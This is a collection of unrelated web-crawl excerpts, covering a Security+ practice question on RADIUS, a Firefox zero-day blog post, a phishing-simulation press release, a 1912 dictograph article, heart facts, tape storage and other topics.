Watch some more cool videos: Current video game characters battle old-school 8-bit rivals Nokia admits faking phone video Watch a robot turn into a car without Michael Bay's assistance Sherlock Holmes is really good at Blue's Clues Watch this preview of Lego Star Wars: The Empire Strikes Out | <urn:uuid:04cd9075-c3ad-4862-8f3c-ef230df81693> | CC-MAIN-2017-09 | http://www.itworld.com/article/2718773/consumerization/visit-a-time-when-humans-needed-help-making-phone-calls.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00478-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.953896 | 376 | 2.8125 | 3 |
Questions derived from the CompTIA SY0-101 – Security+ Self Test Software Practice Test.
Objective: Communication Security
SubObjective: Recognize and understand the administration of the following types of remote access technologies: 802.1x, VPN, RADIUS, TACACS, L2TP/PPTP, SSH, IPSEC, Vulnerabilities
Item Number: SY0-22.214.171.124
Single Answer, Multiple Choice
Which technology provides centralized remote user authentication, authorization and accounting?
- Single sign-on
Remote Authentication Dial-In User Service (RADIUS) provides centralized remote user authentication, authorization, and accounting.
A virtual private network (VPN) is a technology that allows users to access private network resources over a public network, such as the Internet. Tunneling techniques are used to protect the internal resources.
A demilitarized zone (DMZ) is an isolated subnet on a corporate network that contains resources that are commonly accessed by public users, such as Internet users. The DM is created to isolate those resources to ensure that other resources that should remain private are not compromised. A DMZ is usually implemented with the use of firewalls.
Single sign-on is a feature whereby a user logs in once to access all network resources.
RADIUS is defined by RFC 2138 and 2139. A RADIUS server acts either as the authentication server or as a proxy client that forwards client requests to other authentication servers. The initial network access server, which is usually a VPN server or dial-up server, acts as a RADIUS client by forwarding the VPN or dial-up client’s request to the RADIUS server. RADIUS is the protocol that carries the information between the VPN or dial-up client, the RADIUS client, and the RADIUS server.
The centralized authentication, authorization, and accounting features of RADIUS allow central administration of all aspects of remote login. The accounting features allow administrators to track usage and network statistics by maintaining a central database.
Wikipedia.org, RADIUS, http://en.wikipedia.org/wiki/RADIUS | <urn:uuid:3b86ee25-6311-4c83-9dcd-70a76cdf499c> | CC-MAIN-2017-09 | http://certmag.com/communication-security/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00422-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.869996 | 453 | 2.90625 | 3 |
We knew about Java’s “Write once, run everywhere” mantra which very quickly turned into jokes like “Write once, pwn everywhere”. But with the latest Firefox zero-day, Oracle isn’t the only one that faces this problem.
Firefox, much like Java, can be found across various platforms and is quite a popular choice for people that run Linux. In fact, the Tor Browser itself uses Firefox.
Granted, the latest exploit against Mozilla’s browser, was intended for people running Windows:
Not too surprisingly, this prompted an almost immediate reaction from the Tor Project to advise people to stop using Microsoft’s Operating System.
While there is some truth in there, would it really be enough?
Case in point, this specific Firefox vulnerability is actually cross-platform, although from our tests, code execution only seems to happen on Windows.
Here’s a video showing the Firefox flaw on Apple’s Mac OS X. The browser crashes, and even if no actual code execution happened, the possibility is not out of this world.
While Mozilla has adopted a fast release cycle with automatic updates, people can be running older (but still supported) versions, as is the case with this Firefox 17 Extended Support Release (ESR).
Having to maintain multiple versions is probably one of software developers’ worst headaches. The reality is that many enterprises cannot readily upgrade that often due to many applications’ constraints to particular configurations.
This is definitely an issue as software vendors will naturally tend to focus their efforts on the latest version of the software they make, and that includes bug fixes and security improvements.
Jerome Segura (@jeromesegura) is Senior Security Researcher at Malwarebytes. | <urn:uuid:77f07f4a-0fa8-4b1a-a36f-65a804afccaf> | CC-MAIN-2017-09 | https://blog.malwarebytes.com/threat-analysis/2013/08/firefox-zero-day-a-quick-look-at-yet-another-cross-platform-exploit/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00598-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940093 | 363 | 2.5625 | 3 |
TraceSecurity launched the TraceSecurity Phishing Simulator, a secure, cloud-based solution that allows organizations to safely perform on-demand social engineering tests that mimic real-world attacks. Results are tracked to analyze employee actions and determine an organization’s social engineering risk.
TraceSecurity expert analysts have conducted hundreds of social engineering engagements, and its Phishing Simulator extends these services through an online tool that takes minutes to identify how vulnerable an organization’s employees are to social engineering attacks.
Many of the most dangerous threats to information security come from human error, and technological controls do little to prevent these careless mistakes. Performing a social engineering test helps organizations identify areas of weakness within an organization’s existing security awareness training initiatives, and allows them to determine the most effective resolutions.
With the Phishing Simulator, organizations can evaluate the effectiveness of existing information security policies, determine how well employees adhere to internal security procedures when presented with a phishing email, assess the level of security awareness among employees, and identify areas for remediation.
Many of the recent Advanced Persistent Threat (APT) exploits, such as the South Carolina Department of Revenue and New York Times breaches, have been suspected to have used phishing as their initial attack vectors to launch large scale attacks. It takes only a single employee to fall victim to these types of cyber threats to put an entire organization at risk.
“Deploying a simulated phishing attack against groups of employees not only tests their willingness to click on an unsolicited email, but also determines if they are apt to download potentially harmful code onto company resources,” said Jim Stickley, TraceSecurity CTO. “Malicious messages often contain malware that, when activated, can easily infect an entire network, which is why we developed Phishing Simulator. We believe every organization should, at a minimum, test a few employees and see how they do.”
Based on TraceSecurity’s research of email-based social engineering simulations, the company found that 30 percent of employees clicked on a link that could be a malicious website that may infect the computer with malware. In addition, the study found that 5 percent of employees manually installed malicious software on their computer that could compromise the network. Phishing simulations are a key risk assessment component to evaluate the awareness and effectiveness of an organization’s security policies.
For more information on self-assessment, read Learn by doing: Phishing and other online tests. | <urn:uuid:aa964a33-62bd-4a22-84fa-1443dcbff341> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2013/03/26/cloud-based-tool-simulates-social-engineering/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00598-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.934534 | 501 | 2.578125 | 3 |
In yesterday’s post we explained what Chip and PIN cards are and how they’re catching on worldwide. Today I’d like to go over the benefits of Chip and PIN so you can see why so many countries are adopting the technology. Chip and PIN cards provide benefits to cardholders, merchants and banks, including:
Safety - Chip and PIN cards are more secure than traditional magnetic stripe cards, it is exceptionally difficult to copy the information stored on the card and the use of a unique PIN prevents the use of a lost or stolen card being used by someone else.
Faster Payments - with Chip and PIN, transactions are faster and there is no need to check a signature.
Fewer Disputes - Chip and PIN reduces fraudulent and disputed payments.
Customer Confidence - Chip cards are harder to counterfeit, and PIN numbers help prevent fraud involving lost and stolen cards.
Chip-enabled technology has the ability to eliminate the need for tethered devices to process payments in the field, making it a technology to keep an eye on for any business with a mobile workforce. | <urn:uuid:7ebee153-df01-4aaa-8b61-f3d0432b84cf> | CC-MAIN-2017-09 | http://blog.decisionpt.com/chip-and-pin-benefits | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00474-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.941542 | 220 | 2.65625 | 3 |
Simoes K.,Federal University of Goais |
Magosso R.F.,Centro Universitario Of Rio Preto Da University Unirp |
Lagoeiro C.G.,Centro Universitario Of Rio Preto Da University Unirp |
Castellan V.T.,Centro Universitario Of Rio Preto Da University Unirp |
And 6 more authors.
Revista Brasileira de Medicina do Esporte | Year: 2014
Introduction: Free radicals produced during exercise may exceed the antioxidant defense system, causing oxidative damage to specific biomolecules. The lesions caused by free radicals in cells can be prevented or reduced by natural antioxidants, which are found in many foods. Lycopene is one of the most potent carotenoids with antioxidant properties, and it is used to prevent carcinogenesis and atherogenesis, as it protects molecules such as lipids, low-density lipoproteins (LDL), proteins and DNA. Objective: To investigate the role of lycopene as a potential protector of cardiac and skeletal muscle fibers against oxidative stress during strenuous exercise, which would cause morphological changes in these tissues. Methods: The experiments consisted of 32 adult male rats divided into four groups: Two control groups and two trained groups with and without lycopene supplementation (6 mg per animal). The animals of the trained groups were subjected to 42 swimming sessions over a nine-week period, involving daily swimming sessions, five days a week, with overload produced by increasing the training time. The morphological analysis was performed using histological slides of cardiac and skeletal muscle tissues. Results: Modifications were observed in cardiac and skeletal muscle tissue in the trained group that did not receive lycopene supplementation, while the trained group supplemented with lycopene showed muscle tissue with a normal morphological appearance. The tissues of both supplemented and non supplemented sedentary control groups showed no change in their histological characteristics. Conclusion: It can be stated that lycopene exerted a protective effect on cardiac and skeletal muscles against oxidative stress induced by strenuous exercise, besides promoting cardiac neovascularization, and can be used efficiently by athletes and physically active individuals. Source | <urn:uuid:fe5b9b04-7e24-494b-ae2e-d2550c6d7129> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/centro-universitario-of-rio-preto-da-university-unirp-2399013/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00650-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.931747 | 447 | 2.78125 | 3 |
A Primer on Sidetone
Digital telephones include electronic circuitry that provides an effect called “sidetone”, which allows a caller to be able to hear their own voice through the telephone earpiece. An example of this effect can be heard by blowing into the mouthpiece of a telephone handset and hearing the sound transmitted through the earpiece.
Sidetone is beneficial as it provides audible feedback to the caller that the telephone is working. In loud environments, however, sidetone can become excessive as the handset microphone picks up background noise and transmits it through to the earpiece. Not only does this make it more difficult to hear the remote party, it also makes it unpleasant to use the telephone.
By operating with lowered audio transmit levels, the Algo 1075 Noisy Location Handset reduces the pickup of background noise and, in turn, sidetone. This allows the near-end caller to hear the remote caller more clearly. It also reduces the background noise transmitted to the remote caller making it easier for them to hear what is said. | <urn:uuid:94b26313-f594-41ab-99f1-57957162ab3d> | CC-MAIN-2017-09 | http://www.algosolutions.com/products/specialty-handsets/1075-noisy-location-handsets/reducing-sidetone.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.950337 | 219 | 2.890625 | 3 |
Satellite predicts eruption
- By Frank Konkel
- Aug 23, 2013
Mount Sakurajima, photographed by NOAA's Suomi NPP satellite. (NOAA image)
One of the National Oceanic and Atmospheric Administration's satellites detected the Aug. 18 eruption of Japan's Mount Sakurajima 14 hours before it occurred, according to a statement from the weather agency.
The satellite – the Suomi National Polar-orbiting Partnership (NPP) – pinpointed heat from the volcano while on one of its 14 daily orbits around the Earth using its Visible Infrared Imaging Radiometer Suite (VIIRS) sensor. Half a day after the satellite detected the thermal buildup, the volcano erupted, sending an ash plume three miles into the air.
Technically speaking, Suomi NPP is the first in the government's $13 billion next-generation Joint Polar Satellite System (JPSS) fleet. It's really just a converted demonstration satellite launched in 2011 in hopes of mitigating a gap in polar-orbiting satellite coverage.
The Visible Infrared Imaging Radiometer Suite sensor that allowed the satellite to predict the volcanic eruption.
While its sibling satellites – the first of which will not be operational until 2017 – will have far more powerful technical capabilities and instrumentation, detecting a volcanic eruption before it happens is proof that Suomi NPP has some cool features of its own.
"VIIRS continues to show new and remarkable capabilities that will enable scientists to better understand the Earth – from the land to the highest levels of the atmosphere," said Dr. Chris Elvidge, head of the Earth Observation Group of NOAA's National Geophysical Data Center in Boulder, Colo.
VIIRS will be included in the JPSS-1 and JPSS-2, which are expected to be operational in 2017 and 2022, respectively. JPSS represents the next generation of polar-orbiting satellites that will have an increased role in weather prediction.
Note: This story was updated on Aug. 26 to correct projected date of operation for JPSS-2.
Frank Konkel is a former staff writer for FCW. | <urn:uuid:cdad9a3c-2908-442c-bf85-1a67c3fd3859> | CC-MAIN-2017-09 | https://fcw.com/articles/2013/08/23/noaa-satellite-volcano.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171176.3/warc/CC-MAIN-20170219104611-00342-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.905559 | 440 | 3.125 | 3 |
The leader in Eavesdropping Detection
and Counterespionage Consulting services
for business & government, since 1978.
March 30, 1912
Detective Burns Listened
to Dynamiter Plots
Instruments That Can be Used for Eavesdropping
or for Business Purposes
It has been the impression of the public that the dictograph is a very complicated mechanism for automatically and unerringly recording the conversation carried on near it. In general, the mechanism employed is quite simple and easily understood. In fact there is no new principle involved. The invention is an adaptation of well-known apparatus to a peculiar purpose or situation.
The instruments are of three general types. First is the type shown in Fig. 1, sometimes modified as shown in Fig. 2. This is the type of apparatus referred to by Detective Burns in his dynamiting cases. It is really nothing more than a simple telephone circuit arranged to convey sounds from the talking station shown on the left to the listening or recording station on the right. Sometimes the transmitter is mounted in an innocent-looking square or triangular box, divided into two compartments. Within one compartment is room enough for small size dry batteries and for storing the receiver when the apparatus is not in use or is being carried about from place to place; within the other is located the transmitter element.
One wall of this second compartment of the box is, in reality, a thin diaphragm, with which is connected the microphone or resistance-varying element, usually a sensitive granular carbon transmitter button or cup. The size of the box is quite immaterial, but it is evident that the larger the diaphragm, the greater is the area of the sound-wave acting upon the transmitter element, and hence the better and stronger the reproduction of the sound at the receiving end of the line.
This is the type of instrument said to have been used by the famous Detective Burns and his associates in the MacNamara case and the so-called Lorimer-Hines bribery case. In each case the method of operating the device was somewhat as follows: Burns or any of his associated preventives “rigged up” a few rooms in a hotel. Appointments were made with suspects and accomplices. In one room in which the conversation or consultation was held, there was located the little transmitters disposed in a convenient but inconspicuous position; in the adjoining room the receiver of the instrument was placed, and an expert stenographer with the receiver to his ear took down the conversation carried on by the preventive and the suspect in the other room. Thus, it is declared, very valuable evidence was gathered. Indeed the success of the case is said to have depended upon the use of this ingenious device.
The use of this form of apparatus with slight modification has been applied to large auditoriums and churches. Instead of using a single transmitter and a single receiver, as shown in the figure, a number of transmitters
placed at various points about the stage or pulpit are arranged to gather the sounds and transmit to persons at remote parts of the hall the voices of the speakers or the strains of the orchestra. As many receivers as may be required are connected into the circuit to reproduce the sound at the remote points.
A somewhat similar apparatus is employed for announcing trains in the waiting rooms of large railway stations. The train announcer speaks into a transmitter and the sound waves are electrically reproduced by means of loud-speaking telephone receivers placed at various points about the great hall or waiting room. It is remarkable how clearly the voice is transmitted, for the announcement can be clearly and distinctly heard in every part of the immense room reverberating sonorously amid the huge marble pillars.
In a modified form, as shown in Fig. 2, the apparatus is employed in large business offices between a manager’s desk or office in one room and a stenographer’s desk in another room for the purpose of expeditiously dictating letters and transmitting intelligence of any kind. In this case the apparatus is really nothing more than an intercommunicating telephone system, for speech can be transmitted in both directions. Various switches are employed for connecting the apparatus of any one of a number of stenographers’ desks with the manager’s instrument.
The second broad class is shown diagrammatically in Fig. 3. This is an arrangement combining the use of the telephone and phonograph. This type of instrument is often known as the “telephonograph,” and in practice it assumes a number of different forms. In each case the principle is the same as that outlined in the figure. As soon as the telephone and the phonograph were invented the combined use of the two instruments suggested itself to a number of inventors. As early as February 1889, there were public exhibitions of such use of the two instruments in combination.
In a lecture before the Franklin Institute at Philadelphia, Mr. William J. Hammer performed the following experiment: A phonograph at New York was set to talk into a carbon transmitter, sending current waves over a telephone line to Philadelphia, a distance of 103 miles to the audience at the Franklin Institute. At that station a loud-speaking receiver talked into another phonograph and then in turn delivered to the amazed audience the tones of the original speaker in New York City.
No great practical use has been found for this combined instrument due to the great difficulty of keeping a suitable surface constantly in motion ready to record the sound waves. Furthermore much of the apparatus is too large and cumbersome to be conveniently portable, due largely to the size and weight of the motor mechanism for driving the cylinders.
It was early proposed to apply this instrument to the ordinary telephone to keep a record of the conversations passing over the line. This was to be especially useful in keeping a record of these conversations for subsequent use in legal controversies. It would be too easy, however, to manufacture such a record. At present an application of such device is found in some systems of telephone exchanges.
A continuously operating phonograph is used as a “busy-test.” If the subscriber calls a busy line he is automatically connected at the central station with this phonograph which continuously repeats the well-known ditty, “the line is busy, please call again.”
Another use of this type of instrument has been made in certain automatic fire-alarm installations. In this case thermostats are arranged to close a circuit at a predetermined temperature. This circuit controls the operation of a phonograph device, connecting it with the nearest telephone line. Arranged on the cylinder of this instrument is the message to be transmitted to the central station or to the nearest fire station. Such record may contain suitable words as “there is a fire at No. 99 Park Row.” The instrument is arranged first to signal central and then to repeat this message a number of times. “Central,” upon receiving such a message, connects the line directly with fire headquarters and thus, automatically an alarm is sent in almost instantaneously. With this arrangement, it is evident that a subscriber would be apprised of the fire call if he were using the telephone line and would immediately stop his conversation and hang up his receiver to allow the call to continue to “central.”
The third type of instrument is the dictating phonograph. This has nothing in common with the dictograph used by Detective Burns. The instrument consists of a strand or frame upon which is mounted a cylinder-bearing mechanism and a motor mechanism. By means of a foot-control, which is not clearly shown in the photograph, the motor (either spring or electrically driven) is started and stopped. The speaker sits at a table with his notes before him and speaks into an adjustable tube.
One of these instruments of the kind shown in Fig. 4 was used before the Senate Committee on Interstate Commerce. It was before this committee and recorded upon such a machine that George W. Perkins, many times a millionaire, and formerly business partner of J. Pierpont Morgan, and admitted to be a great authority on organized industry, made his remarkable statement that he had retired from business at the age of 48 because he was tired of making money and that he was devoting the rest of his life to a study of how to do good for the rest of mankind.
The machines as used are employed merely as an intermediate step between shorthand notes and a complete typewritten copy. Expert and highly paid stenographers took down in shorthand notes the name and the exact words of the speaker. These stenographers worked in shifts, each man taking stenographic notes for about an hour at a time. He would then take his written notes to an adjoining room and read them slowly and distinctly into the dictograph instrument, fresh cylinders being supplied whenever needed. By this means a very clear and uniform dictation resulted. A typist took this prepared cylinder to a similar machine arranged to reproduce the sound and transcribed at her leisure the words of the original speaker. By this means a great deal of time was saved since the transcribing could be done by a number of typists. The witnesses called before the committee at 10:30 were thus enabled late in the afternoon to read and correct the original testimony, and each day’s work was thus made complete in itself.
— THANK YOU! | <urn:uuid:0bf41c30-9579-4620-820d-9e5ed7435d3d> | CC-MAIN-2017-09 | http://counterespionage.com/1912-how-detective-burns-listened-to-dynamiter-plots.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00162-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967606 | 1,903 | 2.828125 | 3 |
What email address or phone number would you like to use to sign in to Docs.com?
If you already have an account that you use with Office or other Microsoft services, enter it here.
Or sign in with:
Signing in allows you to download and like content, and it provides the authors analytical data about your interactions with their content.
Embed code for: Chapter 6 outline
Select a size
Johnny R. Phillips 10-17-2016 Chapter 6 outline
The Revolution within:
Abigail Adams born in Massachusetts in 1744
The dream of equality:
1.The Revolution unleashed public debates and political and social struggles that enlarged the scope of freedom and challenged inherited structures of power within America.
2.The Declaration of Independence’s assertion that “all men are created equal” announced a radical principle whose full implication could not be anticipated
Expanding the political nation:
1.the democratization of freedom was dramatic for free men.
2.Arisans, small farmers, laborers, and militia all emerged as self-conscious elements in politics
The revolution in Pennsylvania:
1.The prewar elite of Pennsylvania was dramatic for free men.
2.Pennsylvania’s 1776 constitution sought to institutionalize democracy in a number of ways, including
1.Establishing an annually elected, one-house legislature
2.Allowing tax-paying men to vote
3.Abolishing the office of governor
1.Each state wrote a new constitution and all agreed that their government must be republics.
2.One-house legislatures were adopted only by Pennsylvania, Georgia, and Vermont.
3.John Adam’s “balanced governments” included house legislatures.
The right to vote:
1.The property qualification for suffrage was hotly debated.
2.The least democratization occurred in the southern states, where highly deferential political tradition enabled the landed gentry to retain their control of political affairs.
3.By the 1780s, with the exception of Virginia, Maryland, and New York, a large majority of the adult white male population could meet voting requirements.
Toward religious toleration
Joining forces with France and inviting Quebec to join in the struggle against Britain had weakened anti-Catholicism.
Separating church and state:
1.The drive to separate church and state brought together Deists with members of evangelical sects.
2.Many states still limited religious freedom
3.Catholics gained the right to worship without persecution throughout the state
Jefferson and Religious Liberty:
1.Thomas Jefferson’s bill for establishing religious freedom separated church and state.
2.Thanks to religious freedom, the early republic witnessed an amazing proliferation of religious denominations.
3.DEFING ECONOMIC FREEDOM
Toward free labor:
By the 1800’s indentured servitude had all but disappeared from the United States
The soul of a republic:
To most free Americans, equality meant equal opportunity rather than equality of condition.
The politics of inflation:
Some Americans responded to wartime inflation by accusing merchants of hoarding goods by seizing stocks of food to be sold at the traditional “just price”
The debate over free trade:
1.Congress urged states to adopt measures to fix wages and prices.
2.Adam Smith’s argument that the “invisible hand” of the market directed economic life more effectively and fairly than government.
4.THE LIMITS OF LIBERTY
The limits of Liberty:
An estimated 20 to 25 percent of Americans were Loyalists.
The Loyalists’ Plight:
1.The war for Independence was in some respect a civil war among Americans.
2.When the war ended, as many as 100,000 Loyalists were banished from the United States or emigrated voluntarily.
The Indian Revolution:
1.American independence meant the loss of freedom for Indians.
Slavery and the revolution:
The irony that Americans cried for Liberty while enslaving Africans.
Obstacles to Abolition:
Some patriots argued that slavery for blacks made freedom possible for whites
The cause of general Liberty:
1.By defining freedom as a universal entitlement rather than as a set of rights specific to a particular place or people, the Revolution inevitably raised questions about the status of slavery in the new nation.
2.Samual Sewall’s The Selling of Joseph (1700) was the first antislavery tract in America
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that would bring “national Punishment”
Petitions for Freedom;
1.Slaves in the north and in the South appropriated the language of liberty for their own purposes.
2.Slaves presented “freedom petitions” in New England in the early 1770s.
1.Nearly 100,000 slaves deserted their owners and fled to British lines.
2.At the end of the war, over 15,000 blacks accompanied the British out of the country.
Abolition in the North:
Between 1777 and 1804, every state north of Maryland took steps toward emancipation.
Free black communities:
After the war, free black communities with their own churches, schools, and leaders came into existence.f-conscious elements in politics
3.In 1773, Benjamin Rush warned that slavery was a “national crime” that w | <urn:uuid:2436acc1-a773-48af-b742-c0854a50d902> | CC-MAIN-2017-09 | https://docs.com/johnny-phillips/2644/chapter-6-outline | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174159.38/warc/CC-MAIN-20170219104614-00090-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.924394 | 1,137 | 3.4375 | 3 |
I love videos that can explain difficult concepts with simple ones, such as this video that talks about the Diffie-Hellman key exchange, one of the "earliest practical implementations of key exchange within the field of cryptography," as well as the concept of the discrete logarithm. How do they do it? Paint blobs, rope and clocks.
Still, for the traditionalists out there, the video also talked about prime number and modal math, which went a bit over my head, but look! Paint blobs!
Read more of Keith Shaw's ITworld.TV blog and follow the latest IT news at ITworld. Follow Keith on Twitter at @shawkeith. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook. | <urn:uuid:8ebd5522-1878-4ded-af5a-32aa8fb66d45> | CC-MAIN-2017-09 | http://www.itworld.com/article/2730072/security/public-encryption-described-via-paint-blobs.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00386-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942184 | 165 | 2.578125 | 3 |
Microsoft first delivered Encarta on CD-ROM in 1993 as part of the early wave of multimedia products for PCs, before adding a website as well. In response to criticism against Wikipedia's dubious veracity, Microsoft sought credibility by acquiring other encyclopedias, including Collier's Encyclopedia and New Merit Scholar's Encyclopedia. The company had tried to buy Encyclopedia Britannica but was rebuffed.
Encarta just could not keep up with Wikipedia and fell totally behind. User changes and updates were enabled in 2006, but only after Encarta staff approved them. The result? Encarta Premium, the high-end product, boasted 62,000 articles compared to Wikipedia's 1 million-plus. In March 2009, Microsoft announced it was discontinuing both the Encarta disc and online versions. | <urn:uuid:f06af789-bc97-4a59-853a-23b1eb34dad4> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2288711/data-center/125008-Microsofts-Graveyard-16-products-that-Microsoft-has-killed.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00438-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.955356 | 159 | 2.515625 | 3 |
Heart Facts - Interesting Facts About Human Heart
Let's get straight to the heart of the matter. The heart's job is to move blood. Here is a collection of some amazing and interesting facts about human heart.
Facts About Human Heart
Day and night, the muscles of your heart contract and relax to pump blood throughout your body. When blood returns to the heart, it follows a complicated pathway. If you were in the bloodstream, you would follow the steps below one by one.
- Oxygen-poor blood (shown in blue) flows from the body into the right atrium.
- Blood flows through the right atrium into the right ventricle.
- The right ventricle pumps the blood to the lungs, where the blood releases waste gases and picks up oxygen.
- The newly oxygen-rich blood (shown in red) returns to the heart and enters the left atrium.
- Blood flows through the left atrium into the left ventricle.
- The left ventricle pumps the oxygen-rich blood to all parts of the body.
Do right and left seem backward? That's because you're looking at an illustration of somebody else's heart. To think about how your own heart works, imagine wearing this illustration on your chest.
Sure, you know how to steal hearts, win hearts, and break hearts. But how much do you really know about your heart and how it works? Read on to your heart's content.
Put your hand on your heart. Did you place your hand on the left side of your chest? Many people do, but the heart is actually located almost in the center of the chest, between the lungs. It's tipped slightly so that a part of it sticks out and taps against the left side of the chest, which is what makes it seem as though it is located there.
Hold out your hand and make a fist. If you're a kid, your heart is about the same size as your fist, and if you're an adult, it's about the same size as two fists.
Interesting Facts About Human Heart
- Your heart beats about 100,000 times in one day and about 35 million times in a year. During an average lifetime, the human heart will beat more than 2.5 billion times.
- Give a tennis ball a good, hard squeeze. You're using about the same amount of force your heart uses to pump blood out to the body. Even at rest, the muscles of the heart work hard - twice as hard as the leg muscles of a person sprinting.
- Feel your pulse by placing two fingers at pulse points on your neck or wrists. The pulse you feel is blood stopping and starting as it moves through your arteries. As a kid, your resting pulse might range from 90 to 120 beats per minute. As an adult, your pulse rate slows to an average of 72 beats per minute.
- The aorta, the largest artery in the body, is almost the diameter of a garden hose. Capillaries, on the other hand, are so small that it takes ten of them to equal the thickness of a human hair.
- Your body has about 5.6 liters (6 quarts) of blood. This 5.6 liters of blood circulates through the body three times every minute. In one day, the blood travels a total of 19,000 km (12,000 miles) - that's four times the distance across the US from coast to coast.
- The heart pumps about 1 million barrels of blood during an average lifetime - that's enough to fill more than 3 super tankers.
- Lub-DUB, lub-DUB, lub-DUB. Sound familiar? If you listen to your heart-beat, you'll hear two sounds. These "lub" and "DUB" sounds are made by the heart valves as they open and close.
This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you.
We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus | <urn:uuid:027299c5-6407-4eb8-be2b-9b4b76f1e6e5> | CC-MAIN-2017-09 | http://www.knowledgepublisher.com/article-241.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501169769.33/warc/CC-MAIN-20170219104609-00031-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942104 | 899 | 3.40625 | 3 |
On location in Africa, a movie crew wraps up the day's shooting on a nature documentary and camera operators shut down their rigs. NAND flash cards are removed from the cameras and the scenes that were just shot are transferred to another medium for delivery to a post-production facility. Magnetic tape, the oldest form of storage in digital computing, goes to work.
Long considered slow and outdated, tape is holding on in many enterprises that need cost-effective, long-term storage, and it's even finding new applications in the virtualized and increasingly video-centric world of IT.
Despite declining shipments of equipment over the past several years, tape is increasingly important in some environments, especially large organizations that deal with mountains of information. The relic isn't as obsolete as it seemed.
"A lot of that stigma actually isn't as true as it used to be," Enterprise Strategy Group (ESG) analyst Jason Buffington says. Tape technology is getting faster, it's more economical than hard disk drives (HDDs) and it has a smaller carbon footprint because it requires less power, he says.
As enterprises deal with bigger sets of data and choose or are forced to retain more of it for many years, tape will play an even more vital role, Buffington says.
Fewer Tapes, But Bigger Data
"The more data you have, and the more strategic you are about managing storage, the higher the likelihood is that you are going to continue, if not increase, your footprint on tape," Buffington said. Though overall sales of tape products continue to fall, individual deployments are getting bigger, according to industry analysts.
Nature documentary crews in Africa and Antarctica, among other video teams, have used tape to handle the massive video files that come out of their productions. Now that movies are shot with digital cameras, there's no sending film reels in to be developed and edited, or even scanned for digital editing. Crews use tape for its reliability, the ease of transporting it without fat wide-area network pipes, and the security of physical media, according to Sanjay Tripathi, director and business line executive at IBM's System & Technology Group, Storage Platform.
After the tapes from each day's shooting are sent to the studio or remote production facility, the footage is transferred onto HDDs for editing, then put back on tape as the movie goes on to other production steps. Video is storage-heavy: A feature-length 3-D movie can add up to 4PB or 5PB of data, Tripathi says.
IBM even shared an Emmy award with Fox Broadcasting for developing a workflow that includes offloading content to tape. But in less glamorous settings, tape is stepping in to solve many other storage problems, analysts say.
Data has been stored on magnetic tape since the time of the earliest digital computers in the early 1950s. As HDDs grew in capacity and shrank in price, IT shops started using them for backup instead of tape. That trend continues.
"Tape's been under a lot of pressure in the enterprise," IDC analyst Robert Amatruda says.
Deduplication Drives Disk Sales
Disk-based backups can be accessed immediately, and the files navigated just like primary storage. Data deduplication, which allows information to be stored more efficiently, has helped popularize disk-based backup appliances, Amatruda says.
"It changes the economics of disk very favorably," he said. Sales of such appliances have been growing in double digits over the past few years, he said.
Still, tape remains part of backup in many shops. It's the primary backup medium at 25 percent of enterprises surveyed by ESG, and it's used for backup at 56 percent of the surveyed sites, Buffington said. By comparison, only 2 percent of enterprises said they back up directly to cloud storage.
Tape survives partly due to inertia, says Pund-IT analyst Charles King.
"A lot of it has to do with prior use and existing infrastructure investments," King says. "You've put millions of dollars into it, and it's cheaper to keep the old stuff rolling than it is to migrate to a new system."
However, tape retains the edge over HDDs and flash in many cases. Tape cartridges cost well under $100 and hold terabytes of data. They also consume less power than HDDs because they don't have to be kept spinning. When it comes to transporting very large amounts of data, shipping tapes overnight can be faster and cheaper than using a fat wide-area network pipe.
The classic use case for tape now is long-term data retention, such as holding on to tax returns or medical records. Once they go onto a tape cartridge, those files can sit for years without needing any electricity or drive maintenance.
"If you're going to do that with any kind of scale and any kind of economics, you're going to use tape," ESG's Buffington said.
That type of storage often takes the form of archiving, where it's not an extra copy of the data being stored for recovery but the primary copy of old data that may be rarely used.
"We're seeing tape really change the use case from more of a backup and recovery medium to more of an archive medium," IDC's Amatruda said.
